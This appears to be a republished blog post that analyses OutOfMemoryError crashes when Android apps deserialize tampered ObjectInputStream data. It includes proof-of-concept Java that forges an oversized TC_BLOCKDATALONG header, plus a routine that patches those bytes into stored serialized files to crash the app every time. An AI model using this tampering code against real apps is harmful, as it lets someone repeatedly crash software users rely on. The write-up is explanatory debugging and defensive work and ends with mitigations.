Android Security Attack: OOM Caused by Object Serialization

Source: Internet  Editor: 程序博客网  Time: 2024/06/06 04:38

Preface


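        I recently used ObjectInputStream/ObjectOutputStream to serialize and deserialize objects in a project and ran into OOM crashes. While fixing them I took a brief look at how serialization and deserialization work for classes that implement the Serializable interface, and this post records what I found. Along the way I discovered a security risk in persisting serialized data: the stored data can be maliciously modified so that deserialization triggers an OOM every time.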

Usage scenario


1 Data handling scheme


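        Persisting: while running, the app first serializes the object to bytes with ObjectOutputStream.writeObject, then encrypts the serialized bytes, and finally stores the encrypted data in a file under the app's data directory.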



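        Reading and parsing: the app reads the data back from the file, decrypts it with the matching algorithm, and finally turns the byte stream back into an object with ObjectInputStream.readObject.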
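The two steps above can be sketched roughly as follows. This is a minimal illustration, not the project's actual code: the article does not name the encryption algorithm, so AES-GCM, the class name EncryptedObjectStore and the methods seal/open are all assumptions made for the example. Writing the returned bytes to a file (and reading them back) is left to the caller.

```java
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.security.SecureRandom;

// Hypothetical helper: serialize -> encrypt, and decrypt -> deserialize.
final class EncryptedObjectStore {
    private static final int IV_LEN = 12;    // bytes; a common GCM nonce size
    private static final int TAG_BITS = 128; // GCM authentication tag length

    /** Serializes the value, encrypts it, and returns IV + ciphertext. */
    static byte[] seal(Serializable value, SecretKey key) throws Exception {
        ByteArrayOutputStream plain = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(plain)) {
            oos.writeObject(value);
        }
        byte[] iv = new byte[IV_LEN];
        new SecureRandom().nextBytes(iv);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(TAG_BITS, iv));
        byte[] encrypted = cipher.doFinal(plain.toByteArray());

        ByteArrayOutputStream out = new ByteArrayOutputStream();
        out.write(iv);
        out.write(encrypted);
        return out.toByteArray(); // the caller persists these bytes to a file
    }

    /** Decrypts IV + ciphertext and deserializes the result. */
    static Object open(byte[] stored, SecretKey key) throws Exception {
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.DECRYPT_MODE, key,
                new GCMParameterSpec(TAG_BITS, stored, 0, IV_LEN));
        // With GCM, doFinal throws if the stored bytes were modified.
        byte[] plain = cipher.doFinal(stored, IV_LEN, stored.length - IV_LEN);
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(plain))) {
            return ois.readObject();
        }
    }
}
```

An authenticated mode is chosen here on purpose: if the bytes handed to readObject can be changed without detection, the deserializer is the first component to notice, which is exactly the situation analysed in the rest of this post.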



2 Problems encountered

        With the scheme above, the following two kinds of OOM crashes showed up:

(1) OOM 1
java.lang.OutOfMemoryError: Failed to allocate a 942137073 byte allocation with 4194240 free bytes and 487MB until OOM
    at java.io.ObjectInputStream.readBlockDataLong(ObjectInputStream.java:569)
    at java.io.ObjectInputStream.readContent(ObjectInputStream.java:699)
    at java.io.ObjectInputStream.discardData(ObjectInputStream.java:636)
    at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1662)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:657)
    at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1782)
    at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
(2) OOM 2
java.lang.OutOfMemoryError: Failed to allocate a 789137073 byte allocation with 2317152 free bytes and 456MB until OOM
    at java.io.DataInputStream.decodeUTF
    at java.io.DataInputStream.decodeUTF
    at java.io.ObjectInputStream.readContent(ObjectInputStream.java:699)
    at java.io.ObjectInputStream.discardData(ObjectInputStream.java:636)
    at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1662)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:657)
    at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1782)
    at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
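        The stacks roughly say that while deserializing an object with ObjectInputStream.readObject, the runtime had to allocate roughly 900 MB (OOM 1) or 750 MB (OOM 2), which caused the OOM. The maximum heap an app's Java layer can allocate is defined by the system property dalvik.vm.heapsize, and its value can differ between vendors and devices. The configuration of my test device is:
        [Figure: dalvik.vm.heapsize setting on the test device]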


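        On that device heapsize is set to 256M, so the VM of each app can allocate at most 256 MB; when it needs more, an OutOfMemoryError is thrown. A side note: many people catch Exception in order to catch everything, but that does not catch OutOfMemoryError. The inheritance relationship is:

            java.lang.Throwable
                java.lang.Exception
                java.lang.Error
                    java.lang.VirtualMachineError
                        java.lang.OutOfMemoryError

        As the hierarchy shows, OutOfMemoryError derives from Error and is not on the same branch as Exception, so to catch everything including Errors you have to catch Throwable.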
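A small sketch makes the difference concrete. The class CatchDemo and its method are made up for this example, and the error is thrown directly instead of exhausting the heap so that the result is deterministic.

```java
// Hypothetical demo: catch (Exception) does not see an OutOfMemoryError.
final class CatchDemo {
    /** Returns a description of which handler caught the simulated error. */
    static String whoCatchesOom() {
        try {
            try {
                // Simulated; a real OOM would come from a failed allocation.
                throw new OutOfMemoryError("simulated");
            } catch (Exception e) {
                return "caught by catch (Exception)";
            }
        } catch (Throwable t) {
            // OutOfMemoryError is an Error, so it skips the inner handler.
            return "caught by catch (Throwable)";
        }
    }
}
```

Catching Throwable only gives the app a chance to continue; whether it can actually recover after a real OOM depends on how much memory is left, so this should be treated as best effort.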

3 Analysis


3.1 Stack analysis


        The two OOMs actually share the same cause. The analysis below focuses on OOM 1, the one that ends in ObjectInputStream.readBlockDataLong. Here is that function:
    /**
     * Reads and returns an array of raw bytes with primitive data. The array
     * will have up to 255 bytes. The primitive data will be in the format
     * described by {@code DataOutputStream}.
     *
     * @return The primitive data read, as raw bytes
     *
     * @throws IOException
     *             If an IO exception happened when reading the primitive data.
     */
    private byte[] readBlockData() throws IOException {
        byte[] result = new byte[input.readByte() & 0xff];
        input.readFully(result);
        return result;
    }

    /**
     * Reads and returns an array of raw bytes with primitive data. The array
     * will have more than 255 bytes. The primitive data will be in the format
     * described by {@code DataOutputStream}.
     *
     * @return The primitive data read, as raw bytes
     *
     * @throws IOException
     *             If an IO exception happened when reading the primitive data.
     */
    private byte[] readBlockDataLong() throws IOException {
        byte[] result = new byte[input.readInt()];
        input.readFully(result);
        return result;
    }
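        Two functions are shown above, readBlockData and readBlockDataLong. Judging by the names they do similar work, with readBlockDataLong handling larger amounts of data. The comments confirm this: readBlockData reads blocks of at most 255 bytes, and readBlockDataLong reads blocks of more than 255 bytes. Note that readBlockDataLong allocates a byte array of whatever size input.readInt() returns, without any upper bound.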
Going further up the stack, the caller is ObjectInputStream.readContent:
    /**
     * Reads the content of the receiver based on the previously read token
     * {@code tc}.
     *
     * @param tc
     *            The token code for the next item in the stream
     * @return the object read from the stream
     *
     * @throws IOException
     *             If an IO exception happened when reading the class
     *             descriptor.
     * @throws ClassNotFoundException
     *             If the class corresponding to the object being read could not
     *             be found.
     */
    private Object readContent(byte tc) throws ClassNotFoundException,
            IOException {
        switch (tc) {
            case TC_BLOCKDATA:
                return readBlockData();
            case TC_BLOCKDATALONG:
                return readBlockDataLong();
            case TC_CLASSDESC:
                return readNewClassDesc(false);
            case TC_OBJECT:
                return readNewObject(false);
            case TC_LONGSTRING:
                return readNewLongString(false);
            case TC_EXCEPTION:
                Exception exc = readException();
                throw new WriteAbortedException("Read an exception", exc);
            case TC_RESET:
                resetState();
                return null;
            default:
                throw corruptStream(tc);
        }
    }
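        This function uses the tc (a token code) to decide in which format to read the data that follows it. That suggests serialization and deserialization with ObjectInputStream/ObjectOutputStream follow a defined format, or standard. A quick search turned up the specification of the Serializable stream format: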

                                                               Grammar for the Stream Format
        
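        The specification defines the order in which each part is written and the tc that belongs to each part. This post focuses on the problem itself and does not walk through the format; interested readers can study the specification on their own. With that, the cause of the OOM can be roughly located: the data being deserialized contains a TC_BLOCKDATALONG token, so deserialization ends up in readBlockDataLong. One more level up the stack are ObjectInputStream.readNewClassDesc and ObjectInputStream.discardData: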
    /**
     * Reads a new class descriptor from the receiver. It is assumed the class
     * descriptor has not been read yet (not a cyclic reference). Return the
     * class descriptor read.
     *
     * @param unshared
     *            read the object unshared
     * @return The {@code ObjectStreamClass} read from the stream.
     *
     * @throws IOException
     *             If an IO exception happened when reading the class
     *             descriptor.
     * @throws ClassNotFoundException
     *             If a class for one of the objects could not be found
     */
    private ObjectStreamClass readNewClassDesc(boolean unshared)
            throws ClassNotFoundException, IOException {
        ObjectStreamClass newClassDesc = readClassDescriptor();
        registerObjectRead(newClassDesc, descriptorHandle, unshared);
        descriptorHandle = oldHandle;
        primitiveData = emptyStream;

        //load class...

        // Consume unread class annotation data and TC_ENDBLOCKDATA
        discardData();
        checkedSetSuperClassDesc(newClassDesc, readClassDesc());
        return newClassDesc;
    }

    /**
     * Reads and discards block data and objects until TC_ENDBLOCKDATA is found.
     *
     * @throws IOException
     *             If an IO exception happened when reading the optional class
     *             annotation.
     * @throws ClassNotFoundException
     *             If the class corresponding to the class descriptor could not
     *             be found.
     */
    private void discardData() throws ClassNotFoundException, IOException {
        primitiveData = emptyStream;
        boolean resolve = mustResolve;
        mustResolve = false;
        do {
            byte tc = nextTC();
            if (tc == TC_ENDBLOCKDATA) {
                mustResolve = resolve;
                return; // End of annotation
            }
            readContent(tc);
        } while (true);
    }
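        From the comment and code of ObjectInputStream.readNewClassDesc, its main job is to read the class descriptor from the serialized data and load the corresponding class through the class loader. It then calls discardData. According to the comment on that call, discardData reads and consumes data that is not needed, such as class annotation data, until it reads TC_ENDBLOCKDATA. Every token before that terminator is handed to readContent, and that includes TC_BLOCKDATALONG. Here is the definition of TC_BLOCKDATALONG: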
    /**
     * Tag to mark a long block of data. The long following this tag
     * indicates the size of the block.
     */
    public static final byte TC_BLOCKDATALONG = (byte) 0x7A;
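This tc means that the data block following it is a large one. Despite the wording of the comment, the value after the tc is an int (4 bytes, read with readInt) that gives the length of the block.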
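         The cause can therefore be summarized as follows: when ObjectInputStream.readObject deserializes an object, it reads the class data and loads the class through the class loader; ObjectInputStream.discardData then tries to consume the TC_BLOCKDATALONG data that deserialization does not need. After reading the 4-byte length that follows the token, readBlockDataLong tries to create a byte array of that int size, and the OOM occurs.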
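To see how five bytes turn into a huge allocation request, the header can be decoded without allocating anything. The sketch below is illustrative only: BlockHeaderPeek and declaredLength are names invented for this example, while the token values 0x77 and 0x7A are the TC_BLOCKDATA and TC_BLOCKDATALONG constants from java.io.ObjectStreamConstants.

```java
import java.io.ByteArrayInputStream;
import java.io.DataInputStream;
import java.io.IOException;

// Hypothetical helper: decode a block-data header the way readContent would,
// but return the declared length instead of allocating a buffer of that size.
final class BlockHeaderPeek {
    static final byte TC_BLOCKDATA = 0x77;
    static final byte TC_BLOCKDATALONG = 0x7A;

    /** Returns the declared block length, or -1 if the token is not block data. */
    static long declaredLength(byte[] bytes) throws IOException {
        DataInputStream in = new DataInputStream(new ByteArrayInputStream(bytes));
        byte tc = in.readByte();
        if (tc == TC_BLOCKDATA) {
            return in.readByte() & 0xff; // 1-byte length, at most 255
        }
        if (tc == TC_BLOCKDATALONG) {
            return in.readInt();         // 4-byte big-endian length
        }
        return -1;
    }
}
```

For example, the bytes 7a 7a 7a 67 67 decode to TC_BLOCKDATALONG with a declared length of 0x7a7a6767, which is about 1.9 GB, far more than any app heap discussed in this post.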

3.2 Analysis of the abnormal TC_BLOCKDATALONG data


        To see when TC_BLOCKDATALONG data is written under normal conditions, look for clues on the serialization side, in ObjectOutputStream. Searching ObjectOutputStream.java for TC_BLOCKDATALONG shows that it is only used in the function drain:
    /**
     * Writes buffered data to the target stream. This is similar to {@code
     * flush} but the flush is not propagated to the target stream.
     *
     * @throws IOException
     *             if an error occurs while writing to the target stream.
     */
    protected void drain() throws IOException {
        if (primitiveTypes == null || primitiveTypesBuffer == null) {
            return;
        }

        // If we got here we have a Stream previously created
        int offset = 0;
        byte[] written = primitiveTypesBuffer.toByteArray();
        // Normalize the primitive data
        while (offset < written.length) {
            int toWrite = written.length - offset > 1024 ? 1024
                    : written.length - offset;
            if (toWrite < 256) {
                output.writeByte(TC_BLOCKDATA);
                output.writeByte((byte) toWrite);
            } else {
                output.writeByte(TC_BLOCKDATALONG);
                output.writeInt(toWrite);
            }

            // write primitive types we had and the marker of end-of-buffer
            output.write(written, offset, toWrite);
            offset += toWrite;
        }

        // and now we're clean to a state where we can write an object
        primitiveTypes = null;
        primitiveTypesBuffer = null;
    }
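        From this function, the TC_BLOCKDATALONG tag and the int length field after it are written to the output stream together, and the length never exceeds 1024. When there is more data, it is split into several TC_BLOCKDATALONG blocks of 1024 bytes each (the last chunk may be shorter, and a chunk under 256 bytes is written as TC_BLOCKDATA instead). In other words, under normal conditions the length field after TC_BLOCKDATALONG cannot exceed 1024. The conclusion is that in the OOM case the data finally passed to deserialization was itself bad, and most likely it was damaged during storage or decryption.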
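The chunking rule in drain can be mirrored in a few lines. This is only a sketch of the logic quoted above, with invented names (DrainChunks, chunkSizes, plausibleLongBlockLength); the plausibility check is a heuristic that holds for streams produced by this particular drain implementation and is not a general validator.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical mirror of the chunking logic in drain().
final class DrainChunks {
    static final int MAX_CHUNK = 1024;

    /** Sizes of the blocks drain() would emit for 'total' buffered bytes. */
    static List<Integer> chunkSizes(int total) {
        List<Integer> sizes = new ArrayList<>();
        int offset = 0;
        while (offset < total) {
            int toWrite = Math.min(MAX_CHUNK, total - offset);
            sizes.add(toWrite);
            offset += toWrite;
        }
        return sizes;
    }

    /** drain() uses TC_BLOCKDATALONG only for chunks of 256..1024 bytes. */
    static boolean plausibleLongBlockLength(int declared) {
        return declared >= 256 && declared <= MAX_CHUNK;
    }
}
```

With this rule, 2500 buffered bytes become blocks of 1024, 1024 and 452 bytes, while a declared length such as 942137073 from OOM 1 is clearly outside anything the writer would produce.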

3.3 Reproducing the crash

       
        The analysis above shows that the OOM is caused by bad data reaching deserialization. Following that idea, look directly at ObjectOutputStream.writeClassDesc:
    /**
     * Write a class descriptor {@code classDesc} (an
     * {@code ObjectStreamClass}) to the stream.
     *
     * @param classDesc
     *            The class descriptor (an {@code ObjectStreamClass}) to
     *            be dumped
     * @param unshared
     *            Write the object unshared
     * @return the handle assigned to the class descriptor
     *
     * @throws IOException
     *             If an IO exception happened when writing the class
     *             descriptor.
     */
    private int writeClassDesc(ObjectStreamClass classDesc, boolean unshared) throws IOException {
        if (classDesc == null) {
            writeNull();
            return -1;
        }
        output.writeByte(TC_CLASSDESC);
        writeClassDescriptor(classDesc);
        // (excerpt: the surrounding code that defines classToWrite and handle is omitted)
        annotateClass(classToWrite);
        drain(); // flush primitive types in the annotation
        output.writeByte(TC_ENDBLOCKDATA);
        writeClassDesc(classDesc.getSuperclass(), unshared);
        return handle;
    }

    /**
     * Writes optional information for class {@code aClass} to the output
     * stream. This optional data can be read when deserializing the class
     * descriptor (ObjectStreamClass) for this class from an input stream. By
     * default, no extra data is saved.
     *
     * @param aClass
     *            the class to annotate.
     * @throws IOException
     *             if an error occurs while writing to the target stream.
     * @see ObjectInputStream#resolveClass(ObjectStreamClass)
     */
    protected void annotateClass(Class<?> aClass) throws IOException {
        // By default no extra info is saved. Subclasses can override
    }
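        This function calls writeClassDescriptor to write the class descriptor to output, then calls annotateClass, and then writes TC_ENDBLOCKDATA as the terminator of the class descriptor. On the reading side, ObjectInputStream.readNewClassDesc reads the class descriptor and then calls discardData, which consumes whatever tokens sit between the descriptor and that terminator.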
        Following this idea, one can subclass ObjectOutputStream and write (TC_BLOCKDATALONG, data length) in annotateClass. When the written length is large, the OOM reproduces every time. The code is:
import android.util.Log;

import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.lang.reflect.Field;

public class AnObjectOutputStream extends ObjectOutputStream {
    private static final String TAG = "AnObjectOutputStream";

    /**
     * Reproduces the stack ending in java.io.ObjectInputStream.readBlockDataLong.
     * This is the default. The bytes are TC_BLOCKDATALONG (0x7a) followed by
     * the int length 0x7a7a6767.
     */
    private static final byte[] DISCARD_BYTES_LONG_DATA = new byte[] {
            0x7a, 0x7a, 0x7a, 0x67, 0x67
    };

    /**
     * Reproduces the stack
     *         java.io.DataInputStream.decodeUTF
     *         java.io.DataInputStream.decodeUTF
     *         java.io.ObjectInputStream.readNewLongString
     */
    private static final byte[] DISCARD_BYTES_LONG_STRING = new byte[] {
            0x7c, 0x7a, 0x7a, 0x67, 0x67
    };

    private DataOutputStream mInnerOutput;

    private boolean mStackBlockData = true;

    public AnObjectOutputStream(OutputStream output) throws IOException {
        super(output);
    }

    /**
     * Calling setStackBlockData(false) reproduces the stack
     *         java.io.DataInputStream.decodeUTF
     *         java.io.DataInputStream.decodeUTF
     *         java.io.ObjectInputStream.readNewLongString
     */
    public void setStackBlockData(boolean blockData) {
        mStackBlockData = blockData;
    }

    @Override
    protected void annotateClass(Class<?> aClass) throws IOException {
        // By default no extra info is saved. Subclasses can override
        Log.i(TAG, "annotateClass aClass:" + aClass);
        installOutputStream();
        if (mInnerOutput == null) {
            return;
        }
        // Write the oversized header directly into the class annotation area.
        if (mStackBlockData) {
            mInnerOutput.write(DISCARD_BYTES_LONG_DATA);
        } else {
            mInnerOutput.write(DISCARD_BYTES_LONG_STRING);
        }
        Log.i(TAG, "annotateClass write success");
    }

    /** Fetches the private "output" field of ObjectOutputStream via reflection. */
    private void installOutputStream() {
        Object obj = null;
        try {
            // Look the field up on ObjectOutputStream itself so that further
            // subclassing does not break the lookup.
            Field field = ObjectOutputStream.class.getDeclaredField("output");
            field.setAccessible(true);
            obj = field.get(this);
        } catch (Exception e) {
            e.printStackTrace();
        }
        if (obj == null) {
            Log.i(TAG, "installOutputStream failed");
            return;
        }
        mInnerOutput = (DataOutputStream) obj;
    }
}
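        Because the output member of ObjectOutputStream is private, reflection is needed. Sure enough, replacing the regular ObjectOutputStream with AnObjectOutputStream reproduces the OOM on every run. The complete calling code is: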
import com.example.testpopupwindow.stream.AnObjectOutputStream;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

public class SerializeThread extends Thread {
    private static final String TAG = "SerializeThread";

    private Employee mEmployee;

    @Override
    public void run() {
        mEmployee = Employee.create("test");
        Object obj = null;
        try {
            byte[] serializeRes = serialize();
            obj = unserialize(serializeRes);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    private byte[] serialize() throws IOException {
        ByteArrayOutputStream arrOs = new ByteArrayOutputStream();
        // The tampering stream injects the oversized block header.
        ObjectOutputStream oos = new AnObjectOutputStream(arrOs);
        oos.writeObject(mEmployee);
        oos.flush();
        byte[] outArr = arrOs.toByteArray();
        oos.close();
        return outArr;
    }

    private Object unserialize(byte[] serializedata) throws IOException {
        ByteArrayInputStream byteArrayInputStream = null;
        ObjectInputStream objectInputStream = null;
        try {
            byteArrayInputStream = new ByteArrayInputStream(serializedata);
            objectInputStream = new ObjectInputStream(byteArrayInputStream);
            return objectInputStream.readObject();
        } catch (Exception e) {
            // Only Exception is caught here, so the OutOfMemoryError escapes.
        }
        return null;
    }

    /**
     * Test class used to trigger the error.
     */
    public static class Employee implements Serializable {
        String mName;

        private Employee(String name) {
            mName = name;
        }

        @Override
        public String toString() {
            return "Employee mName:" + mName;
        }

        public static Employee create(String name) {
            return new Employee(name);
        }
    }
}
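         Calling new SerializeThread().start() is enough to trigger the OOM; with the default setting the stack ends in ObjectInputStream.readBlockDataLong, as in OOM 1 above.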



3.4 Security issue

        
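        The OOM above points to a security problem with Serializable serialization through ObjectInputStream/ObjectOutputStream: if serialized data produced by the default ObjectOutputStream is stored locally and someone maliciously writes bytes like the ones above at the right position, the app will crash every time it deserializes the modified data. Suppose the serialized Employee above produces a file with the following hexadecimal data:
        [Figure: hex dump of the serialized Employee data]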
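A comparable hex dump can be produced on a desktop JVM with a sketch like the one below. The names StreamDump and Person are invented for this example (Person stands in for the article's Employee), and the exact bytes depend on the class name and fields, so the output will not match the article's dump byte for byte.

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// Hypothetical helper for inspecting a serialized object as hex.
final class StreamDump {
    /** Stand-in for the article's Employee class. */
    static final class Person implements Serializable {
        private static final long serialVersionUID = 1L;
        final String name;
        Person(String name) { this.name = name; }
    }

    static byte[] serialize(Serializable value) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bytes)) {
            oos.writeObject(value);
        }
        return bytes.toByteArray();
    }

    static String toHex(byte[] data) {
        StringBuilder sb = new StringBuilder();
        for (byte b : data) {
            sb.append(String.format("%02x ", b));
        }
        return sb.toString().trim();
    }

    /** Index of TC_ENDBLOCKDATA (0x78) directly followed by TC_NULL (0x70), or -1. */
    static int endOfClassDesc(byte[] data) {
        for (int i = 0; i < data.length - 1; i++) {
            if (data[i] == (byte) 0x78 && data[i + 1] == (byte) 0x70) {
                return i;
            }
        }
        return -1;
    }
}
```

The dump starts with the stream header ac ed 00 05, followed by TC_OBJECT (73) and TC_CLASSDESC (72). For a class without a serializable superclass, the class descriptor ends with 78 70, and that 78 is the position an attacker would target.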



The code that performs the insertion is:
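    // TC_BLOCKDATALONG (0x7a) followed by the int length 0x7a7a6767
    private byte[] mDiscardBytes = new byte[] {
            0x7a, 0x7a, 0x7a, 0x67, 0x67
    };

    private byte[] modifyBlockDataSize(byte[] content) {
        for (int i = 0; i < content.length - 1; i++) {
            // 0x78 is TC_ENDBLOCKDATA, but it is also ASCII 'x' (as in "example"),
            // so also require the TC_NULL (0x70) that follows it when the class
            // has no serializable superclass.
            if (content[i] == (byte) 0x78 && content[i + 1] == (byte) 0x70) {
                return insertLongBlockData(content, i);
            }
        }
        return null; // no class descriptor terminator found
    }

    // Returns a copy of data with mDiscardBytes inserted at insertPos.
    private byte[] insertLongBlockData(byte[] data, int insertPos) {
        byte[] newArray = new byte[data.length + mDiscardBytes.length];
        System.arraycopy(data, 0, newArray, 0, insertPos);
        System.arraycopy(mDiscardBytes, 0, newArray, insertPos, mDiscardBytes.length);
        System.arraycopy(data, insertPos, newArray, insertPos + mDiscardBytes.length, data.length - insertPos);
        return newArray;
    }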
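After this processing, the serialized data looks like this:
[Figure: hex dump of the serialized data after the insertion]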



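        The inserted bytes (7a 7a 7a 67 67, circled in the original figure) are the only change. Once they are in place, deserializing the data makes the app crash with an OOM every time.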
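        As for why the code looks for 0x78: see ObjectOutputStream.writeClassDesc and ObjectInputStream.readNewClassDesc. After reading the class descriptor, readNewClassDesc calls discardData to consume annotation data up to the terminating TC_ENDBLOCKDATA (0x78), and discardData reads any TC_BLOCKDATALONG or TC_LONGSTRING it meets on the way. So it is enough to insert a TC_BLOCKDATALONG or TC_LONGSTRING tc plus length bytes right before that 0x78. Note that 0x78 is also the ASCII code of 'x', so the byte that is matched has to be the descriptor's terminator and not a character inside a class or field name.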

3.5 Summary


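(1) OOM problems during serialization and deserialization with ObjectInputStream/ObjectOutputStream are usually caused by bad data on the deserialization side.
(2) Using ObjectInputStream/ObjectOutputStream carries a security risk. At the very least the serialized data should be encrypted, and ideally its integrity should be verified before it is deserialized.
(3) When deserializing with ObjectInputStream, catch Throwable so that Errors are caught as well and the app can keep running after an OOM.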
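Point (3) can be sketched as a small wrapper. SafeDeserializer and readOrNull are names made up for this example. Returning null on any failure is just one possible policy, and recovery after a real OutOfMemoryError is not guaranteed.

```java
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;

// Hypothetical wrapper: never let a bad stream crash the caller.
final class SafeDeserializer {
    /** Returns the deserialized object, or null if anything goes wrong. */
    static Object readOrNull(byte[] data) {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            return in.readObject();
        } catch (Throwable t) {
            // Covers IOException and ClassNotFoundException as well as
            // Errors such as OutOfMemoryError.
            return null;
        }
    }
}
```

How a tampered stream fails depends on the runtime: the ObjectInputStream code quoted in this post allocates the declared length up front, while other implementations may reject the same bytes with an exception instead. Catching Throwable handles both cases.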

